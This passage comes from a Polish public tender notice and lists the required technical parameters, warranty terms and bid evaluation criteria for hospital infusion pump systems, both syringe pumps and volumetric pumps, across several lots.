insulinoterapii<br/>51)	Możliwość pracy pompy w środowisku MRI - w kompatybilnej stacji dokującej.<br/>52)	Zużycie energii - pobór mocy przez jedną pompę maksymalnie 8VA.<br/>53)	Zasilanie sieciowe zgodne z warunkami obowiązującymi w Polsce, AC 230 V 50 Hz.<br/>54)	Okres gwarancji urządzenia nie mniej niż 24 miesiące.<br/>55)	Urządzenie fabrycznie nowe na gwarancji producenta z datą produkcji nie starszą niż rok 2022.<br/>56)	Serwis i przeglądy urządzenia w miejscu użytkowania przez Zamawiającego.<br/>57)	Dopuszczenie urządzenia do obrotu na rynku polskim jako wyrobu medycznego.<br/><br/>B.	Pompa infuzyjna objętościowa:<br/>1)	Sterowana elektronicznie, umożliwiająca współpracę z systemem centralnego zasilania i zarządzania danymi, przeznaczona do stosowania u dorosłych, dzieci oraz noworodków w celu okresowego lub ciągłego podawania leków zalecanych do terapii infuzyjnej, w skład których wchodzą m.in. koloidy i krystaloidy, krew i składniki krwi, płyny używane do całkowitego żywienia pozajelitowego (TPN), lipidy i płyny stosowane w żywieniu dojelitowym.<br/>2)	Zasilanie przy użyciu zasilacza zewnętrznego lub Stacji Dokującej – napięcie zasilania w zakresie 11-16 V DC.<br/>3)	Dokładność mechaniczna &lt;&lt;±0,5%.<br/>4)	Możliwość podaży preparatów krwiopochodnych.<br/>5)	Możliwość podaży żywienia dojelitowego.<br/>6)	Możliwość podaży leków w układzie zamkniętym zgodnie z definicją NIOSH.<br/>7)	Mechanizm zabezpieczający przed swobodnym niekontrolowanym przepływem składający się z dwóch elementów – jeden w pompie jeden na drenie. Kolorystyczne kodowanie zacisków szczelinowych w zależności od stosowanej terapii.<br/>8)	Zasilanie z akumulatora wewnętrznego przez min 12 h. przy przepływie 25 ml/h.<br/>9)	Możliwość wymiany akumulatora przez użytkownika bez użycia narzędzi.<br/>10)	Masa pompy do1,7 kg.<br/>11)	Przestrzeń zajmowana przez pompę nie większa niż 2 500 cm3.<br/>12)	Możliwość podłączenia odłączalnego uchwytu do przenoszenia i mocowania pompy do rur i szyn medycznych pionowych i poziomych.<br/>13)	Możliwość łączenia 2 i 3 pomp w moduły bez użycia stacji dokującej.<br/>14)	Odłączalny uchwyt do przenoszenia zestawu 2 i 3 pomp zasilanych jednym przewodem.<br/>15)	Podświetlany ekran i przyciski z możliwością regulacji na co najmniej 9 poziomach.<br/>16)	Regulacja głośności w zakresie od 59dBA do 74dBA na co najmniej 9 poziomach.<br/>17)	Regulacja jasności i kontrastu ekranu na co najmniej 9 poziomach.<br/>18)	Możliwość programowania parametrów infuzji w mg, mcg, U lub mmol,z uwzględnieniem lub pominięciem masy ciała w odniesieniu do czasu ( np. mg/kg/min; mg/kg/h; mg/kg/24h).<br/>19)	Zakres prędkości infuzji min. 0,1 do 1 200 ml/h. Prędkość infuzji w zakresie od 0,1 - 99,99ml/h programowana co 0,01ml/godz.<br/>20)	Zmiana szybkości infuzji bez konieczności przerywania wlewu.<br/>21)	Wypełnienie drenu ze stale widoczną na ekranie i możliwą do kontrolowania informacją o przetoczonej objętości.<br/>22)	Możliwość utworzenia Bazy Leków używanych w infuzjoterapii na terenie szpitala z możliwością zastosowania oprogramowania do tworzenia Bibliotek Leków na poszczególne oddziały.<br/>23)	Możliwość skonfigurowania do min. 50 oddziałów w jednej pompie.<br/>24)	Biblioteka Leków zawierająca min.1 000 leków z możliwością podzielenia na min. 30 grup. <br/>25)	Biblioteka leków zawierająca po 10 stężeń dla każdego leku.<br/>26)	Leki zawarte w Bibliotece Leków powiązane z parametrami infuzji (limity względne min-max; limity bezwzględne min-max, parametry standardowe), możliwość wyświetlania naprzemiennego nazwy leku i/lub wybranych parametrów infuzji.<br/>27)	Automatyczne prowadzenie infuzji dołączanej (piggyback).<br/>28)	Automatyczne prowadzenie infuzji przy stopniowym wzroście i spadku prędkości. Infuzja składa się z trzech faz: wzrostu, utrzymania i spadku.<br/>29)	Automatyczne prowadzenie infuzji w trybie okresowym, składającym się z dwóch faz: bolusa i prędkości.<br/>30)	Automatyczne prowadzenie infuzji w trybie programowanym, z możliwością zaprogramowania co najmniej12 faz. Każda faza o określonych parametrach takich jak prędkość, czas, objętość.<br/>31)	Automatyczne prowadzenie terapii dawka w czasie. Po wprowadzeniu parametrów dawki i czasu pompa automatycznie oblicza prędkość infuzji.<br/>32)	Automatyczne przekazywanie danych o podawanym żywieniu (pozajelitowym i dojelitowym) do systemu kontrolowanej insulinoterapii. W bibliotece leków zawarte dane żywienia.<br/>33)	Bolus o określonej objętości. Bolus podawany na żądanie. Maksymalna objętość bolusa po alarmie okluzji ≤0,2ml.<br/>34)	Funkcja KVO (KVO - Keep Vein Open) z możliwością wyłączenia funkcji przez użytkownika<br/>35)	Prezentacja ciągłego pomiaru ciśnienia w linii w formie graficznej.<br/>36)	Akustyczno-optyczny system alarmów i ostrzeżeń.<br/>37)	Menu i komunikaty tekstowe w języku polskim........w związku z ograniczniami więcej w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> System infuzyjny - zestaw pomp składający się z 4 pomp strzykawkowych z kalkulacją dawki i 2 pomp objętościowych z kalkulacją dawki na stacji dokującej z możliwością wpięcia jednocześnie do 6 pomp wraz ze statywem jezdnym o zwiększonej nośności (zamówienie obejmuje dostawę łącznie 2 systemów) – parametry wymagane:<br/>A.	Pompa strzykawkowa:<br/>1)	Sterowana elektronicznie do infuzji dożylnej lub podskórnej u pacjentów dorosłych, dzieci i noworodków w przerywanych lub ciągłych infuzjach płynów pozajelitowych, leków, krwi i preparatów krwiopochodnych.<br/>2)	Zasilanie sieciowe zgodne z warunkami obowiązującymi w Polsce, AC 230 V 50 Hz.<br/>3)	Ochrona przed wilgocią wg normy EN 6060529 IP 22 lub innej równoważnej.<br/>4)	Klasa ochronności zgodnie z normą IEC/EN60601-1: Klasa II, typ CF lub inną równoważną.<br/>5)	Możliwość pracy w karetkach pogotowia ratunkowego z zastosowaniem dedykowanej stacji dokującej.<br/>6)	Możliwość pracy w środowiskach elektromagnetycznych z zastosowaniem. klatki MRI kompatybilnej z pompą.<br/>7)	Zasilanie pompy bezpośrednio z sieci energetycznej za pomocą kabla zasilającego, zasilacz wbudowany wewnątrz urządzenia.<br/>8)	Podtrzymanie pracy pompy przez zasilanie z akumulatora wewnętrznego przez co najmniej 11 godz. przy przepływie 5 ml/godz. Czas ładowania baterii przy wyłączonej pompie w czasie poniżej 6 godz.<br/>9)	Akumulator wewnętrzny o napięciu zasilania 7,2V, pojemność co najmniej 2,2Ah, typ ogniwa: <br/>inteligenta bateria litowo-jonowa z czasem pracy co najmniej 11 godz., przy przepływie 5 ml/godz., czas ładowania przy wyłączonej pompie poniżej 6 godz., czas ładowania przy włączonej pompie poniżej 20 godz.<br/>10)	Pozostały czas pracy urządzenia przy zasilaniu z akumulatora wewnętrznego oraz poziom naładowania akumulatora wyświetlany na ekranie użytkownika. <br/>11)	Wskaźnik – lampka kontrola zasilania oraz wskaźnik stanu naładowania akumulatora widoczne na płycie czołowej urządzenia.<br/>12)	Urządzenie wyposażone w klawiaturę symboliczną.<br/>13)	Urządzenie wyposażone w automatyczną blokadę klawiatury.<br/>14)	Urządzenie wyposażone w blokadę klawiatury z użyciem min. 4-ro cyfrowego kodu.<br/>15)	Urządzenie obsługujące co najmniej 19 profili, pozwalających na wybranie konkretnej konfiguracji pompy i biblioteki leków, dodatkowo 1 profil podstawowy.<br/>16)	Masa pompy wraz z uchwytem do mocowania na stojaku lub szynie do 2,1 kg.<br/>17)	Uchwyt mocowania pompy do rury pionowej, kolumny lub poziomej szyny oraz rączka do przenoszenia na stałe wbudowane w pompę.<br/>18)	Mocowanie strzykawki do czoła pompy, cała strzykawka stale widoczna podczas pracy pompy z pełną swobodą odczytania objętości ze skali strzykawki oraz możliwością wizualnej kontroli infuzji.<br/>19)	Pełne mocowanie strzykawki możliwe zarówno przy włączonej jak i wyłączonej pompie – system obsługiwany całkowicie manualnie.<br/>20)	Osłona tłoka strzykawki uniemożliwiająca wciśnięcie tłoka strzykawki zamontowanej w pompie.<br/>21)	Pompa skalibrowana do pracy ze strzykawkami o objętości 5, 10, 20, 30/35 i 50/60 ml różnych typów oraz różnych producentów.<br/>22)	Automatyczna funkcja antybolus po okluzji – zabezpieczenie przed podaniem niekontrolowanego bolusa po alarmie okluzji, ograniczenie bolusa &lt; 0,35ml.<br/>23)	Zakres szybkości infuzji 0,1 – 1200 ml/godz.<br/>24)	Funkcja programowania infuzji z krokiem co 0,01 jedn. w zakresie 0,1–9,99 ml/ godz. co 0,1 jedn. w zakresie 10-99,9 ml/h, co 1 jedn. w zakresie 100-1200ml/h.<br/>25)	Dokładność prędkości przepływu ±1% dla mechanizmu, ±2% dla strzykawek.<br/>26)	Zmiana szybkości infuzji bez konieczności przerywania wlewu.<br/>27)	Możliwość programowania infuzji w jednostkach na minutę, godzinę, wagę i powierzchnię.<br/>28)	Dostępne opcje przeliczania - powierzchni ciała pacjenta w m² w zakresie od 0,05 m² do 4,5 m², minimalny przyrost 0,01m² oraz wagi, w zakresie 0,25-350 kg z dostępną regulacją co 10 gramów.<br/>29)	Bolus podawany na żądanie bez konieczności wstrzymywania trwającej infuzji, dostępne 2 rodzaje, plus dodatkowo manualne przesunięcie tłoka strzykawki z funkcją zliczania i prezentacji podanej objętości na ekranie urządzenia.<br/>30)	Bolus bezpośredni z szybkością 50 -1200 ml/h (przyrost o 50 ml/h).<br/>31)	Bolus programowany (dawka lub objętość do podania/czas): 0,1–99,9 ml, 0,01–9999 jedn./1 sekundę – 24 h.<br/>32)	Funkcja dawki nasycającej, dawka/czas: 0,01–9999 jedn./1 sekundę – 24 h, automatyczne obliczanie szybkości.<br/>33)	Objętość do podania / dawka wlewu: objętość: 0,1–999 ml/dawka: 0,1–9999 jednostek.<br/>34)	Napełnianie w 3 trybach: obligatoryjnym, nieobligatoryjnym lub zalecanym, szybkość: 1200 ml/h.<br/>35)	Ciągły pomiar ciśnienia w linii zobrazowany w postaci piktogramu na ekranie pompy.<br/>36)	Ustawianie poziomu ciśnienia okluzji na co najmniej 22 poziomach, min. 3 jednostki do wyboru – mmHg, kPa, PSI.<br/>37)	Wybór trybów wlewu, tryb w ml/h, tryby dawkowania: ng/h, ng/kg/min, ng/kg/h, μg/min, μg/h, μg/kg/min, μg/kg/h, mg/min, mg/h, mg/24h, mg/kg/min, mg/kg/h, mg/kg/24h, mg/m˛/h, mg/m˛/24h, g/h, g/kg/min, g/kg/h, g/kg/24h, mmol/h, mmol/kg/h, mmol/kg/24h, mU/min, mU/kg/min, mU/kg/h, U/min, U/h, U/kg/min, U/kg/h, kcal/h, kcal/24h, kcal/kg/h, mEq/min, mEq/h, mEq/kg/min, mEq/kg/h, ustawienie rozcieńczenia: -- jedn. / ml lub -- jedn. / -- ml, Z dawką nasycającą lub bez, objętość lub dawka / jednostka czasu: 0,1–99,9 ml; 00 h 01 – 96 h 00, limit objętości: 0,1–999 ml.<br/>38)	System antybolusowy ≤0,35 ml maks. dla strzykawki 50 ml.<br/>39)	Dynamiczny system ciśnienia z ostrzeżeniem o zmianach ciśnienia.<br/>40)	Funkcja trybów ciśnienia, dostępne minimum dwa tryby – zmienny lub 3 ustalone wcześniej poziomy, zakres: 50–900 mmHg (co 25 mmHg w przedziale 50–250 mmHg / co 50 mmHg w przedziale 250–900 mmHg), funkcja aktywacji i dezaktywacji oraz regulacji.<br/>41)	Wyświetlacz graficzny typu LCD o wymiarach co najmniej 70 mm x 35 mm.<br/>42)	Rejestr pracy urządzenie z możliwością zapamiętania co najmniej 1500 zdarzeń, plik rejestru przechowywany w pamięci urządzenia, podtrzymanie pamięci urządzenia przez min. 10 lat przy odłączonym akumulatorze.<br/>43)	Funkcja KVO (KVO – Keep Vein Open) - Zróżnicowana prędkość KVO z możliwością programowania szybkości od 0,1 do 5 ml/h.<br/>44)	Sygnalizacja wahań ciśnienia w linii, pozwalająca przewidzieć niebezpieczeństwo pojawienia się okluzji lub nieszczelności.<br/>45)	Funkcja – przerwa w pracy urządzenia (tryb standby), w zakresie od 1 min do 24 godzin, programowany co 1 minutę z funkcją automatycznego startu infuzji po zaprogramowanej przerwie.<br/>46)	Urządzenie wyposażone w tryb dzienny i nocny z opcją przełączania między trybami ręcznie i automatycznie.<br/>47)	Menu i komunikaty tekstowe w języku polskim.<br/>48)	Funkcja wyświetlania trendów objętości, szybkości infuzji oraz ciśnienia.<br/>49)	Wbudowana w pompę możliwość dopasowana ustawień oraz zawartości menu do potrzeb oddziału.<br/>50)	Biblioteka leków, do 150 leków w co najmniej 19 profilach wraz z protokołami infuzji (domyślne przepływy, dawki, prędkości bolusa, stężenia itp.).<br/>51)	Akustyczno-optyczny system alarmów i ostrzeżeń.<br/>52)	Alarm pustej strzykawki.<br/>53)	Alarm przypominający – zatrzymana infuzja.<br/>54)	Alarm okluzji.<br/>55)	Alarm rozłączenia linii – spadku ciśnienia.<br/>56)	Alarm rozładowanego akumulatora.<br/>57)	Alarm braku lub źle założonej strzykawki.<br/>58)	Alarm otwartego uchwytu komory strzykawki.<br/>59)	Alarm informujący o uszkodzeniu urządzenia.<br/>60)	Alarm zbliżającego się rozładowania akumulatora.<br/>61)	Alarm blokady klawiatury.<br/>62)	Alarm bliskiego końca infuzji z możliwością zaprogramowania czasu w zakresie 1-30 minut.<br/>63)	Instrukcja obsługi w języku polskim.<br/>64)	Możliwość łączenia pomp w moduły bez użycia dodatkowych elementów.<br/>65)	Kompatybilność ze stacjami dokującymi Agilia Link i Link + posiadanymi przez Zamawiającego.<br/>66)	Okres gwarancji urządzenia nie mniej niż 24 miesiące.<br/>67)	Serwis i przeglądy urządzenia w miejscu użytkowania przez Zamawiającego.<br/>68)	Urządzenie fabrycznie nowe na gwarancji producenta z datą produkcji nie starszą niż rok 2022.<br/>69)	Dopuszczenie urządzenia do obrotu na rynku polskim jako wyrobu medycznego.<br/><br/>B.	Pompa infuzyjna objętościowa:<br/>1)	Elektroniczne sterowana przeznaczona do podawania pacjentom dorosłym, dzieciom i noworodkom w przerywanych lub ciągłych infuzjach płynów pozajelitowych (takich jak roztwory, roztwory koloidalne, żywienie pozajelitowe), leków (takich jak leki rozcieńczone, chemioterapia czy leki znieczulające), krwi i preparatów krwiopochodnych oraz leków, przy wykorzystaniu zatwierdzonych klinicznie dróg podawania.<br/>2)	Zakres szybkości w przedziale 0,1–1500 ml/h z regulacją co 0,1 ml/h w zakresie 10–99,9 ml/h (opcjonalnie 0,01 ml/h w zakresie 0,1–9,99 ml/h), co 1 ml/h w zakresie 100–1500 ml/h.<br/>3)	Dokładność szybkości infuzji ± 5%.<br/>4)	Objętość do podania w infuzji w przedziale 0,1 - 9999 ml, minimalny przyrost - 0,1 jedn. W przedziale 0,1 - 99,9 ml, 1 jedn. w przedziale 100 – 9999 ml.<br/>5)	Czas infuzji 0h01min – 168h00min, funkcja ostrzegania: możliwość aktywowania i dostosowania komunikatu z ostrzeżeniem od 0h01 min do 96h00 min.<br/>6)	Wybór trybów wlewu: tryb w ml/h: Objętość + Szybkość Przepływu, Objętość + Czas, Szybkość <br/>Przepływu + Czas, Objętość + Czas + Szybkość Przepływu, Wzrastająco / Malejąco, Sekwencyjnie / Okresowo, Krople/min, dawka: ng/h, ng/kg/min, ng/kg/h, microg/min, microg/h, microg/ kg/min, microg/kg/h, mg/min, mg/h, mg/24h, mg/kg/min, mg/kg/h, mg/kg/24h, mg/m2/h, mg/m2/24h, g/h, g/kg/min, g/kg/h, g/kg/24h, mmol/h, mmol/kg/h, mmol/kg/24h, mU/min, mU/kg/min, mU/kg/h, U/min, U/h, U/kg/min, U/kg/h, kcal/h, kcal/24h, kcal/kg/h, mEq/min, mEq/h, mEq/kg/min, mEq/kg/h, ustawienia rozcieńczenia: -- jednostki / ml albo -- jednostki / -- ml. z dawka nasycającą lub bez.<br/>7)	Funkcja dawka nasycająca dla 0,1–1500 ml/h, 0,10–9,99 ml/h: przyrost o 0,01 ml/h., 10–99,9 ml/h: przyrost o 0,1 ml/h.,100–1500 ml/h: przyrost o 1 ml/h.<br/>8)	Bolus bezpośredni: szybkość: 50–1500 ml/h (przyrost o 50 ml/h).<br/>9)	Bolus programowany (dawka lub objętość/czas): 0,1–1000 ml, 0,01–9999 jedn./1 sekundę – 24 h.<br/>10)	Możliwość wprowadzania danych pacjenta, masa ciała pacjenta 0,25 - 350 kg....w związku z ograniczeniami więcej informacji znajduje się w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> System infuzyjny - zestaw pomp składający się z 2 pomp strzykawkowych z kalkulacją dawki oraz 1 pompy objętościowej z kalkulacją dawki z możliwością wpięcia do stacji dokującej i zamocowania na statywie jezdnym (zamówienie obejmuje łącznie dostawę 1 systemu) - parametry wymagane:<br/>A.	Pompa strzykawkowa:<br/>1)	Sterowana elektronicznie do infuzji dożylnej lub podskórnej u pacjentów dorosłych, dzieci i noworodków w przerywanych lub ciągłych infuzjach płynów pozajelitowych, leków, krwi i preparatów krwiopochodnych.<br/>2)	Zasilanie sieciowe zgodne z warunkami obowiązującymi w Polsce, AC 230 V 50 Hz.<br/>3)	Ochrona przed wilgocią wg normy EN 6060529 IP 22 lub innej równoważnej.<br/>4)	Klasa ochronności zgodnie z normą IEC/EN60601-1: Klasa II, typ CF lub inną równoważną.<br/>5)	Możliwość pracy w karetkach pogotowia ratunkowego z zastosowaniem dedykowanej stacji dokującej.<br/>6)	Możliwość pracy w środowiskach elektromagnetycznych z zastosowaniem. klatki MRI kompatybilnej z pompą.<br/>7)	Zasilanie pompy bezpośrednio z sieci energetycznej za pomocą kabla zasilającego, zasilacz wbudowany wewnątrz urządzenia.<br/>8)	Podtrzymanie pracy pompy przez zasilanie z akumulatora wewnętrznego przez co najmniej 11 godz. przy przepływie 5 ml/godz. Czas ładowania baterii przy wyłączonej pompie w czasie poniżej 6 godz.<br/>9)	Akumulator wewnętrzny o napięciu zasilania 7,2V, pojemność co najmniej 2,2Ah, typ ogniwa: inteligenta bateria litowo-jonowa z czasem pracy co najmniej 11 godz., przy przepływie 5 ml/godz., czas ładowania przy wyłączonej pompie poniżej 6 godz., czas ładowania przy włączonej pompie poniżej 20 godz.<br/>10)	Pozostały czas pracy urządzenia przy zasilaniu z akumulatora wewnętrznego oraz poziom naładowania akumulatora wyświetlany na ekranie użytkownika. <br/>11)	Wskaźnik – lampka kontrola zasilania oraz wskaźnik stanu naładowania akumulatora widoczne na płycie czołowej urządzenia.<br/>12)	Urządzenie wyposażone w klawiaturę symboliczną.<br/>13)	Urządzenie wyposażone w automatyczną blokadę klawiatury.<br/>14)	Urządzenie wyposażone w blokadę klawiatury z użyciem min. 4-ro cyfrowego kodu.<br/>15)	Urządzenie obsługujące co najmniej 19 profili, pozwalających na wybranie konkretnej konfiguracji pompy i biblioteki leków, dodatkowo 1 profil podstawowy.<br/>16)	Masa pompy wraz z uchwytem do mocowania na stojaku lub szynie do 2,1 kg.<br/>17)	Uchwyt mocowania pompy do rury pionowej, kolumny lub poziomej szyny oraz rączka do przenoszenia na stałe wbudowane w pompę.<br/>18)	Mocowanie strzykawki do czoła pompy, cała strzykawka stale widoczna podczas pracy pompy z pełną swobodą odczytania objętości ze skali strzykawki oraz możliwością wizualnej kontroli infuzji.<br/>19)	Pełne mocowanie strzykawki możliwe zarówno przy włączonej jak i wyłączonej pompie – system obsługiwany całkowicie manualnie.<br/>20)	Osłona tłoka strzykawki uniemożliwiająca wciśnięcie tłoka strzykawki zamontowanej w pompie.<br/>21)	Pompa skalibrowana do pracy ze strzykawkami o objętości 5, 10, 20, 30/35 i 50/60 ml różnych typów oraz różnych producentów.<br/>22)	Automatyczna funkcja antybolus po okluzji – zabezpieczenie przed podaniem niekontrolowanego bolusa po alarmie okluzji, ograniczenie bolusa &lt; 0,35ml.<br/>23)	Zakres szybkości infuzji 0,1 – 1200 ml/godz.<br/>24)	Funkcja programowania infuzji z krokiem co 0,01 jedn. w zakresie 0,1–9,99 ml/ godz. co 0,1 jedn. w zakresie 10-99,9 ml/h, co 1 jedn. w zakresie 100-1200ml/h.<br/>25)	Dokładność prędkości przepływu ±1% dla mechanizmu, ±2% dla strzykawek.<br/>26)	Zmiana szybkości infuzji bez konieczności przerywania wlewu.<br/>27)	Możliwość programowania infuzji w jednostkach na minutę, godzinę, wagę i powierzchnię.<br/>28)	Dostępne opcje przeliczania - powierzchni ciała pacjenta w m² w zakresie od 0,05 m² do 4,5 m², minimalny przyrost 0,01m² oraz wagi, w zakresie 0,25-350 kg z dostępną regulacją co 10 gramów.<br/>29)	Bolus podawany na żądanie bez konieczności wstrzymywania trwającej infuzji, dostępne 2 rodzaje, plus dodatkowo manualne przesunięcie tłoka strzykawki z funkcją zliczania i prezentacji podanej objętości na ekranie urządzenia.<br/>30)	Bolus bezpośredni z szybkością 50 -1200 ml/h (przyrost o 50 ml/h).<br/>31)	Bolus programowany (dawka lub objętość do podania/czas): 0,1–99,9 ml, 0,01–9999 jedn./1 sekundę – 24 h.<br/>32)	Funkcja dawki nasycającej, dawka/czas: 0,01–9999 jedn./1 sekundę – 24 h, automatyczne obliczanie szybkości.<br/>33)	Objętość do podania / dawka wlewu: objętość: 0,1–999 ml/dawka: 0,1–9999 jednostek.<br/>34)	Napełnianie w 3 trybach: obligatoryjnym, nieobligatoryjnym lub zalecanym, szybkość: 1200 ml/h.<br/>35)	Ciągły pomiar ciśnienia w linii zobrazowany w postaci piktogramu na ekranie pompy.<br/>36)	Ustawianie poziomu ciśnienia okluzji na co najmniej 22 poziomach, min. 3 jednostki do wyboru – mmHg, kPa, PSI.<br/>37)	Wybór trybów wlewu, tryb w ml/h, tryby dawkowania: ng/h, ng/kg/min, ng/kg/h, μg/min, μg/h, μg/kg/min, μg/kg/h, mg/min, mg/h, mg/24h, mg/kg/min, mg/kg/h, mg/kg/24h, mg/m˛/h, mg/m˛/24h, g/h, g/kg/min, g/kg/h, g/kg/24h, mmol/h, mmol/kg/h, mmol/kg/24h, mU/min, mU/kg/min, mU/kg/h, U/min, U/h, U/kg/min, U/kg/h, kcal/h, kcal/24h, kcal/kg/h, mEq/min, mEq/h, mEq/kg/min, mEq/kg/h, ustawienie rozcieńczenia: -- jedn. / ml lub -- jedn. / -- ml, Z dawką nasycającą lub bez, objętość lub dawka / jednostka czasu: 0,1–99,9 ml; 00 h 01 – 96 h 00, limit objętości: 0,1–999 ml.<br/>38)	System antybolusowy ≤0,35 ml maks. dla strzykawki 50 ml.<br/>39)	Dynamiczny system ciśnienia z ostrzeżeniem o zmianach ciśnienia.<br/>40)	Funkcja trybów ciśnienia, dostępne minimum dwa tryby – zmienny lub 3 ustalone wcześniej poziomy, zakres: 50–900 mmHg (co 25 mmHg w przedziale 50–250 mmHg / co 50 mmHg w przedziale 250–900 mmHg), funkcja aktywacji i dezaktywacji oraz regulacji.<br/>41)	Wyświetlacz graficzny typu LCD o wymiarach co najmniej 70 mm x 35 mm.<br/>42)	Rejestr pracy urządzenie z możliwością zapamiętania co najmniej 1500 zdarzeń, plik rejestru przechowywany w pamięci urządzenia, podtrzymanie pamięci urządzenia przez min. 10 lat przy odłączonym akumulatorze.<br/>43)	Funkcja KVO (KVO – Keep Vein Open) - Zróżnicowana prędkość KVO z możliwością programowania szybkości od 0,1 do 5 ml/h.<br/>44)	Sygnalizacja wahań ciśnienia w linii, pozwalająca przewidzieć niebezpieczeństwo pojawienia się okluzji lub nieszczelności.<br/>45)	Funkcja – przerwa w pracy urządzenia (tryb standby), w zakresie od 1 min do 24 godzin, programowany co 1 minutę z funkcją automatycznego startu infuzji po zaprogramowanej przerwie.<br/>46)	Urządzenie wyposażone w tryb dzienny i nocny z opcją przełączania między trybami ręcznie i automatycznie.<br/>47)	Menu i komunikaty tekstowe w języku polskim.<br/>48)	Funkcja wyświetlania trendów objętości, szybkości infuzji oraz ciśnienia.<br/>49)	Wbudowana w pompę możliwość dopasowana ustawień oraz zawartości menu do potrzeb oddziału.<br/>50)	Biblioteka leków, do 150 leków w co najmniej 19 profilach wraz z protokołami infuzji (domyślne przepływy, dawki, prędkości bolusa, stężenia itp.).<br/>51)	Akustyczno-optyczny system alarmów i ostrzeżeń.<br/>52)	Alarm pustej strzykawki.<br/>53)	Alarm przypominający – zatrzymana infuzja.<br/>54)	Alarm okluzji.<br/>55)	Alarm rozłączenia linii – spadku ciśnienia.<br/>56)	Alarm rozładowanego akumulatora.<br/>57)	Alarm braku lub źle założonej strzykawki.<br/>58)	Alarm otwartego uchwytu komory strzykawki.<br/>59)	Alarm informujący o uszkodzeniu urządzenia.<br/>60)	Alarm zbliżającego się rozładowania akumulatora.<br/>61)	Alarm blokady klawiatury.<br/>62)	Alarm bliskiego końca infuzji z możliwością zaprogramowania czasu w zakresie 1-30 minut.<br/>63)	Instrukcja obsługi w języku polskim.<br/>64)	Możliwość łączenia pomp w moduły bez użycia dodatkowych elementów.<br/>65)	Kompatybilność ze stacjami dokującymi Agilia Link i Link+ posiadanymi przez Zamawiającego.<br/>66)	Okres gwarancji urządzenia nie mniej niż 24 miesiące.<br/>67)	Serwis i przeglądy urządzenia w miejscu użytkowania przez Zamawiającego.<br/>68)	Urządzenie fabrycznie nowe na gwarancji producenta z datą produkcji nie starszą niż rok 2022.<br/>69)	Dopuszczenie urządzenia do obrotu na rynku polskim jako wyrobu medycznego.<br/><br/>B.	Pompa infuzyjna objętościowa:<br/>1)	Elektroniczne sterowana przeznaczona do podawania pacjentom dorosłym, dzieciom i noworodkom w przerywanych lub ciągłych infuzjach płynów pozajelitowych (takich jak roztwory, roztwory koloidalne, żywienie pozajelitowe), leków (takich jak leki rozcieńczone, chemioterapia czy leki znieczulające), krwi i preparatów krwiopochodnych oraz leków, przy wykorzystaniu zatwierdzonych klinicznie dróg podawania.<br/>2)	Zakres szybkości w przedziale 0,1–1500 ml/h z regulacją co 0,1 ml/h w zakresie 10–99,9 ml/h (opcjonalnie 0,01 ml/h w zakresie 0,1–9,99 ml/h), co 1 ml/h w zakresie 100–1500 ml/h.<br/>3)	Dokładność szybkości infuzji ± 5%.<br/>4)	Objętość do podania w infuzji w przedziale 0,1 - 9999 ml, minimalny przyrost - 0,1 jedn. W przedziale 0,1 - 99,9 ml, 1 jedn. w przedziale 100 – 9999 ml.<br/>5)	Czas infuzji 0h01min – 168h00min, funkcja ostrzegania: możliwość aktywowania i dostosowania komunikatu z ostrzeżeniem od 0h01 min do 96h00 